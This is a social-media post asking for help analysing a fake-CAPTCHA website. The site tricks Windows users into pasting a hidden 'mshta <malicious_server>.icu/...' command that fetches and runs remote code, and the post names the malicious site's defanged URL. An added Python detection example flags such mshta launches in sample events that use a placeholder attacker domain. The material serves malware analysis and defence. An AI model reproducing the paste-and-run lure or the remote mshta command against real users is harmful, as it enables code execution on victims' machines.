cypherhoodlum🏴☠️ on Nostr: Can anybody on Nostr do malware analysis in the wild? This website shows a fake ...
Can anybody on Nostr do malware analysis in the wild?
This website shows a fake CAPTCHA only for Windows users. The CAPTCHA tricks the user into hitting Win + R and Ctrl + V to paste a seemingly innocent-looking verification ID into the Run console, which the website already copied to the user's clipboard upon visiting the site. It's easily missed that part of the pasted string is not visible and actually runs "mshta <malicious_server>.icu/gkcxv.google?i=<uuid>", which executes arbitrary code on the victim's machine.
The source code of the website has a heavily obfuscated script which seems to fetch and construct a payload that is eventually executed using eval() without any user input upon visiting the site. The site also seems to store some data to Ethereum smart contracts every few seconds for some reason.
I'm trying to figure out what the stage 2 mshta payload actually does, and whether the site actually runs something with the mshta utility that can escape the browser sandbox. The payload is fetched from some very short-lived command & control servers, so it's hard to scrape the payload code directly. Does someone have the expertise to investigate this?
The *malicious* website:
https://gameskeys(.)net/we-were-here-forever-controls-guide

#asknostr
Mentions: Ava ॐ (nprofile…l3q3)
Published at 2025-03-29 23:48:57
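For anyone triaging this on the endpoint side, here is an added detection example (not code from the post or from the site in question) that flags the launch pattern described above: mshta.exe started from the Run dialog (parent explorer.exe) with a remote target instead of a local .hta file. The event records are constructed samples in the Image/ParentImage/CommandLine shape of Sysmon Event ID 1, and the domain in them is a placeholder, not the real C2.

```python
import re

# Constructed sample process-creation events (not real telemetry).
# Event 0 mirrors the post's "mshta <server>.icu/gkcxv.google?i=<uuid>" launch
# from the Run dialog; the domain is a placeholder, the UUID is made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta attacker-placeholder.icu/gkcxv.google"
                    "?i=123e4567-e89b-12d3-a456-426614174000"},
    # Benign: an installer running a local .hta file, not from explorer.exe.
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    # Benign: unrelated process from the same parent.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# A remote target: an explicit http(s) scheme, a UNC path, or a bare
# dotted hostname followed by a path (the form the fake CAPTCHA pastes,
# which Windows still resolves as a URL when handed to mshta).
REMOTE_ARG = re.compile(
    r"(?:https?://|\\\\)|\b[a-z0-9-]+(?:\.[a-z0-9-]+)+/[^\s\"']+",
    re.IGNORECASE)


def classify(event):
    """Return the reasons an event looks like a ClickFix-style mshta launch.

    An empty list means the event is not flagged.
    """
    reasons = []
    if not event["Image"].lower().endswith("\\mshta.exe"):
        return reasons
    if not REMOTE_ARG.search(event["CommandLine"]):
        return reasons          # local .hta usage is common and benign
    reasons.append("mshta given a remote target instead of a local .hta file")
    # Win+R runs the child under explorer.exe; scripted installers usually do not.
    if event["ParentImage"].lower().endswith("\\explorer.exe"):
        reasons.append("launched from explorer.exe (consistent with the Run dialog)")
    return reasons


def scan(events):
    """Return (command line, reasons) for every flagged event."""
    return [(e["CommandLine"], classify(e)) for e in events if classify(e)]
```

On a suspected host, the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU keeps the full pasted string, so the hidden part of the command can be recovered there even when the C2 domain has already gone offline.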